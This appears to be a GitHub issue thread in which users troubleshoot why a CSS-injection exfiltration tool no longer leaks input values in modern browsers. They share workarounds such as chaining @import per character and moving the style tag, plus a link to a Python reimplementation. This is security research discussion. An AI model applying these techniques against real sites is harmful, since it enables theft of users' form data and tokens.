Still works?

[ariary]

Hi,

First, great article + finding + tool 😉 I try to reuse it years later with different browser (firefox, chrome). I did not succeed to make it works. As I struggle a bit in rust I have not been able to modify the code to my wish (I wrote my own "clone" of your idea in go. it works with a bot but with my browsers not)

So my question is simple, do you know if the trick always works ? If yes on which browser?

Thank in advance

[OsaAjani]

Hi, I think we have the same problem @ariary. I've tried using sic and for about the same reason as you i've also wrote my own python version of the tool, based the same principles, but it does not work anymore apparently.

I will try to explain what i have observed so far in the hope that @d0nutptr could be of any help on this one. For information i've been testing this one on Ubuntu 20.04 & Chromium Version 102.0.5005.61

So, when i inject the entrypoint css sheets, the browser load it just right, then i makes queries to all the /polling sheets, and then to the first two /callback address. But after that, it stalled. It's like if the browser would stop rendering the css or making the query to callback.

Even stranger, if the developer console is open and i move the mouse hover the page, then all the queries get fired just fine. Without developer console moving the mouse does nothing, but focusing/unfocusing the browser window do the same thing.

Here is a gif of this strange behavior.

I cannot manage to understand what exactly happens, if the browser is not making queries to the callback because too many connections are already open, or if it is because the style is not refreshed somehow.

If someone can check if this is still working or even explain the browser behavior that would be so nice.

Anyway, that really is a nice piece of exploit @d0nutptr !

[ariary]

Hi!

thank you for sharing this with us ! My adaptation works under certain circumstances but I can’t determine which ones yet

[OsaAjani]

I've just tested it, and i got exactly the same situation :/ Also as i have come to take an interest on css exfil for the same reason as you :wink: i've just tried it on the bot and it does not work either :/

Did you manage to find any reproducible situation where your version is working so we can try to nail down what make it fail in our context ?

[pilvar222]

Hey @OsaAjani ! I recently had the exact same problem. I could fix it by placing the style tag after the input element. I can't explain why, but it worked for me. Hope it helps! :)

[ariary]

Hey @OsaAjani ! I recently had the exact same problem. I could fix it by placing the style tag after the input element. I can't explain why, but it worked for me. Hope it helps! :)

@pilvar222 How did you manage to do this? Did you test on a local app? Otherwise, you do not necessarily have control over the style tag injection location

[pilvar222]

Hey @OsaAjani ! I recently had the exact same problem. I could fix it by placing the style tag after the input element. I can't explain why, but it worked for me. Hope it helps! :)

@pilvar222 How did you manage to do this? Did you test on a local app? Otherwise, you do not necessarily have control over the style tag injection location

I did try this on a local app where I had control over the style tag location. Unfortunately, I don't really see how you can do otherwise :/

[pilvar222]

Also, I think chrome now has some trouble with having lots of hanging requests. It seems like placing the @import for the next character in the previously imported css works better. If like me you're too bad at rust to tweak the code, there's this simple python script that does the job https://github.com/sudiptadeb/cssexfil

[Jesse-0x]

Hi there, I had run into similar issue before. This situation also will happen when your selector can't select anything. If you are working with nonce, Google Chrome (and other browser) will delete nonce inside the actual DOM for safety reason. https://stackoverflow.com/questions/55670985/google-chrome-stripping-nonce-values-from-script-tags